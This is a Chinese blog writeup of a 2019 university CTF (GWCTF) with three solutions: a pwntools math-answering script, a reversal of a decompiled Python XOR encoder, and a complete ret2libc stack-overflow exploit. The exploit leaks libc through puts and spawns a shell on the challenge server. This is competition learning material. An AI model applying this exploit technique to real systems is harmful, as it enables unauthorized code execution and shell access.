广东外语外贸大学第三届网络安全大赛Writeup

最新推荐文章于 2025-04-16 14:54:54 发布
最新推荐文章于 2025-04-16 14:54:54 发布
阅读量1k 收藏 1
点赞数
文章标签: 广外CTF WP CTF writeup
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43921239/article/details/103460053
版权
本文详细解析了广东外语外贸大学第三届网络安全大赛中的三道题:Msic数学挑战、RE反编译与Pwn栈溢出攻击。通过代码实现展示了如何解决数学问题、反编译Python代码以及利用栈溢出获取shell。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

广东外语外贸大学第三届网络安全大赛Writeup

官方WP:https://github.com/gwht/2019GWCTF/tree/master/

Msic

math

是男人就下150层嘛,也就是答对150次计算题就返回 flag 嘛。这道题与 pwnable.kr 的一道题很像。题目有作答时间限制,所以用脚本跑吧。可能是人品问题,跑了很多次,最好的就是回答到 147 之后就链接断了(垃圾校园网?)。

最终EXP:

from pwn import *
context.log_level = 'debug'

p = remote("183.129.189.60",10034)

n = 0
while n<150:
	p.recvuntil("Math problem: ")
	math = p.recvuntil("=")[:-2]
	p.sendline(str(eval(math)))
	sleep(1)
	n += 1
else:
    p.sendline("cat flag")

RE

pyre

python文件的反编译。这里使用的是工具Easy Python Decompiler,或者可以在线python反编译(可能存在重复代码bug)。

反编译得到的源码:

# Embedded file name: encode.py
print 'Welcome to Re World!'
print 'Your input1 is your flag~'
l = len(input1) #23
for i in range(l):
    num = ((input1[i] + i) % 128 + 128) % 128
    code += num

for i in range(l - 1):
    code[i] = code[i] ^ code[i + 1]

print code
code = ['\x1f', '\x12', '\x1d', '(', '0', '4', '\x01', '\x06', '\x14', '4', ',', '\x1b', 'U', '?', 'o', '6', '*', ':', '\x01', 'D', ';', '%', '\x13']

这里就是一个加密程序,逆算法就可以了。源码中的第一个 for 循环里面分两种情况(小于128、大于128)带入数据计算后,得出简化加密:(input1[i] + i) % 128

第二个 for 循环中的是列表连续异或,解密时需要从尾部开始再次进行异或。

最终EXP:

a = ['\x1f', '\x12', '\x1d', '(', '0', '4', '\x01', '\x06', '\x14', '4', ',', '\x1b', 'U', '?', 'o', '6', '*', ':', '\x01', 'D', ';', '%', '\x13']
l = len(a)
print l
a = map(ord,a)
for i in range(l-1,0,-1):
	a[i-1] = a[i-1]^a[i]
code = ''
for i in range(l):
	num = (a[i]-i) % 128
	code += chr(num)
print code

Pwn

史上最简单的pwn

32位 C++ 编写的程序,运行(或)需要安装libc:sudo aptitude -f install lib32stdc++6

栈溢出题目,选择的溢出变量为 s 。单单才变量信息看上去没有问题,不存在溢出。

但是后面的会将字符串中的 I 替换为 pretty。只用 I 够多就能覆写 eip。

最终EXP:

#coding:utf-8
from pwn import *
context.log_level = 'debug'
elf = ELF('./easy_pwn')
local = 0
if local:
	p = process('./easy_pwn')
	libc = elf.libc
else:
	p = remote("183.129.189.60","10025")
	libc = ELF('./libc6-i386_2.23.so')
main = 0x80492F5

sd = lambda s:p.send(s)
sl = lambda s:p.sendline(s)
rc = lambda s:p.recv(s)
ru = lambda s:p.recvuntil(s)
sda = lambda a,s:p.sendafter(a,s)
sla = lambda a,s:p.sendlineafter(a,s)

# 泄露 libc 地址
ru("name!\n")
pay = 'I'*0x10 
pay += p32(elf.plt['puts']) + p32(main) + p32(elf.got['puts'])
# gdb.attach(p,"b *0x80490CB")

# 计算函数 system 和字符串 /bin/sh 的地址
sl(pay)
ru('\n')
puts_addr = u32(rc(4))
libc_base = puts_addr - libc.symbols['puts']
system = libc_base + libc.symbols['system']
binsh = libc_base + libc.search("/bin/sh\x00").next()
log.warn("puts_addr --> %s",hex(puts_addr))
log.warn("system --> %s",hex(system))
log.warn("binsh --> %s",hex(binsh))
log.warn("libc_base --> %s",hex(libc_base))

ru("name!\n")
pay = 'I'*0x10
pay += p32(system) + p32(main) + p32(binsh)
# gdb.attach(p,"b *0x80490CB")
sl(pay)

p.interactive()
SkYe231_
关注
i春秋网鼎杯网络安全大赛minified题目writeup
iqiqiya的博客
08-20 1万+
i春秋网鼎杯网络安全大赛minified题目writeup 题目信息:minified 下载链接:https://pan.baidu.com/s/1A42tTEcp4sr_CamXuyRvDQ 密码: hr6m   下载下来是一个压缩包    解压后得到flag_enc.png   如果经常做题,一看就知道是PNG隐写 要用到工具 载入图片后 点击右箭头 发现red0...
第三届“奇安信杯”网络安全技能竞赛 部分题目WriteUP
YueXuan_521的博客
10-24 780
第三届“奇安信杯”网络安全技能竞赛部分题目WriteUP 粘贴到MarkDown中也无法显示,应该被修改宽高了。用010 Editor打开发现GIF文件头,修改文件后缀为gif,文件就可以正常浏览。,压缩包应该隐藏在图片中。根据题目提示,使用Base16解密,得到一大串密文,后面应该还有多重Base加密。使用Uncompyle6工具对test.pyc文件反编译,得到test.py文件。下载附件,解压得到cipher.txt文件。下载附件,解压得到test.pyc文件。下载附件,解压得到flag.png图片。
河南省第四届”金盾信安杯”网络安全大赛writeup(过程,解题思路)
路baby的博客
12-19 4324
河南省第四届”金盾信安杯”网络安全大赛writeup(过程,解题思路)Misc-qianda0_Sdoku​编辑 Misc-盗梦空间 Misc-Megmi Misc-数据泄露01-账号泄露追踪 Web-eZphp2 Web-EzPHP Web-有来无回 Crypto-小菜一碟 Crypto-RRSSAA​编辑 Crypto-simpleR
BuuCTF __ [GWCTF 2019]pyre 1
最新发布
A3138246926的博客
04-16 306
将 code 转化为ASCII码。
广东省第四届“强网杯”网络安全大赛(“泄露的秘密WP”)
weixin_46245411的博客
10-14 5426
感觉应该就算交了WP也进不了决赛~~ 我直接把WP放这里 “泄露的秘密”: 发现存在大量“HTTP”包。 下一步跟踪HTTP流后, 发现存在SQL注入攻击。 使用python脚本获取传递的参数信息:(附上脚本) import pyshark import urllib import re file=pyshark.FileCapture('log.pcapng',display_filter="http") ...
第一届广东省大学生网络安全攻防大赛PWN Writeup
SkYe's Blog
05-24 3623
两个题目都是无输出堆题,最近一次比赛在 nepctf 遇到:https://www.mrskye.cn/archives/bdb75c49/#sooooeasy 思路方法概述:https://www.jianshu.com/p/fe28639e406e BabyNote 题目是基于 glibc 2.31 的菜单堆题。 漏洞出现在 free 之后没有置零指针导致的 UAF : 程序没有输出函数,倒是有一个提示的函数 gift 函数,输出堆地址最低两个字节,没用明白,到最后也不关他的事情。 思路: 利.
第四届红帽杯网络安全大赛-线上赛Writeup1
08-03
第四届红帽杯络安全赛-线上赛Writeup 第四届红帽杯络安全赛 - 线上赛 Writeup 第四届红帽杯络安全赛-线上赛Writeup 第四届红帽杯络安全赛-
2022年第三届“网鼎杯”网络安全大赛(白虎组)部分题目附件
09-19
2022年第三届“网鼎杯”网络安全大赛(白虎组)部分题目附件 2022年第三届“网鼎杯”网络安全大赛(白虎组)部分题目附件 2022年第三届“网鼎杯”网络安全大赛(白虎组)部分题目附件 2022年第三届“网鼎杯”网络...
2022年第三届“网鼎杯”网络安全大赛(青龙组)部分题目附件
09-19
2022年第三届“网鼎杯”网络安全大赛(青龙组)部分题目附件 2022年第三届“网鼎杯”网络安全大赛(青龙组)部分题目附件 2022年第三届“网鼎杯”网络安全大赛(青龙组)部分题目附件 2022年第三届“网鼎杯”网络...
山东省大学生网络安全技能大赛决赛Writeup.pdf
09-30
本文档总结了山东省大学生网络安全技能大赛决赛的Writeup,涵盖了Crypto0x00 RSA1、RSA2和仿射加密三个部分的知识点。 Crypto0x00 RSA1 在Crypto0x00 RSA1部分中,我们需要使用Python脚本或者OpenSSL来解出RSA加密...
2024年台州市第三届网络安全技能大赛(MISC)—Black Mamba_台州市第三届网络安全大赛
2401_84281698的博客
05-02 136
一张图片 常规得分离,属性,,盲水印等都尝试过 无果! 考点:异或解密(第一次遇到,没想到)这里放入 发现底部有沉余字符,与十进制异或,得到压缩包 这里得到压缩包 然后我们使用或者爆破得到密码: 这应该是一种编码 咱也不知道 直接随波逐流一下!德沃夏克键盘解码(第一次见到)总结一下:就是还是得多做题 做思路很重要 下次在遇到这种 就可以多一种尝试方法了!初级黑客 1、网络安全理论知识(2天) ①了解行业相关背景,前景,确定发展方向。 ②学习网络安全相关法律法规。 ③网络安全运营的概念。 ④等保简介、等保
第二届广东省大学生网络攻防大赛 pyre
沐一 · 林 的博客
05-22 1054
2022 年 5 月广东省省赛 pyre . . 以前做过 pyc 逆向,直接的 python exe 逆向还是第一次: 第一种方法: 用 pyinstxtractor.py 将 exe 文件转换成 pyc 文件。 . . 用 PyInstaller 打包后,pyc 文件的前 8 个字节会被抹掉,所以最后要自己添加回去。前四个字节为 python 编译的版本,后四个字节为时间戳。想要获得编译版本可以查看打包文件里 struct 的信息,我这里还是提取出 struct 这个文件,有 struct 作为对
广东省网络安全竞赛部分web,misc wp
竹盐笙熙的博客
05-13 1532
广东省网络安全竞赛部分web,misc wp
第三届广东省强网杯网络安全大赛WEB题writeup
qq_28205153的博客
11-04 4305
1. 小明又被拒绝了 直接访问根目录,报403错误 一般是做了ip限制,加上 X-Forwarded-For 头即可绕过 接着又提示不是管理员,仔细看响应头的 Set-Cookie ,有个 admin=0 ,很明显是通过Cookie来判断是否是管理员,直接在请求中加个 Cookie:admin=1 即可绕过,获取flag. 2.XX? 直接访问根目录,发现是个百度页面,看了下源码,没什...
【广东大学生网络攻防大赛-WriteUp(非官方)】Misc | 复合
ZXW_NUDT的博客
05-23 1547
导出对象http flaggggggg.exe用压缩包解压 WordDocument记事本打开看到: 查看pass.md的16进制数据,发现是个zip文件在前边加上50 4B两个数据 改后缀打开可以看到 Emklyusg=E2=80=82gni=E2=80=82bvvymlag=E2=80=82tsqic=E2=80=82colz=E2=80=82jx= moxvl=E2=80=82tiwhz=E2=80=82ebmee,=E2=80=82Zhjeoig=E2=80=82Krpvpi-Zgvlyv.
BUU刷题笔记2
SkYe's Blog
09-13 216
#!/usr/bin/python -- coding: utf-8 -- from pwn import * context(log_level = ‘info’, os=‘linux’, arch=‘amd64’) p = process("./note3") p = remote(“node3.buuoj.cn”,25763) elf = ELF("./note3") libc = ELF("/lib/x86_64-linux-gnu/libc.so.6") def add(size,content)
HITCON_2018_children_tcache
SkYe's Blog
10-24 988
tcache 结合 off by null 基本情况 Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled FORTIFY: Enabled 基本堆管理器,有增删查功能。用 chunk_ptr_list 和 chunk_size_list 两个链表维护,数量上限为 12 ,使用的不是只递增的下标,而是哪个下标没有使用就用哪个,即只.
github更新fork项目,不额外增加commit方法
SkYe's Blog
02-15 579
原文地址:https://gitbook.tw/chapters/github/syncing-a-fork.html 第一招:砍掉重练 这招很简单,就是把Fork 过来的专案砍掉,再重新Fork 一次,这样保证就会是最新版本。不要笑,虽然这招感觉技术力很低,但这招很好用,完全不需要打任何程式码或指令就可以完成。我也知道其实不少人会用这个方式在进行同步… 第二招:跟上游同步 比较有技术力一点的做法(其实也是比较正统的做法),就是把原作的专案设定成上游专案,Fetch 回来之后再自己手动合并。 第一步:设.
[GWCTF 2019]pyre
since_2020的博客
04-23 438
pyc 文件,python 逆向
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值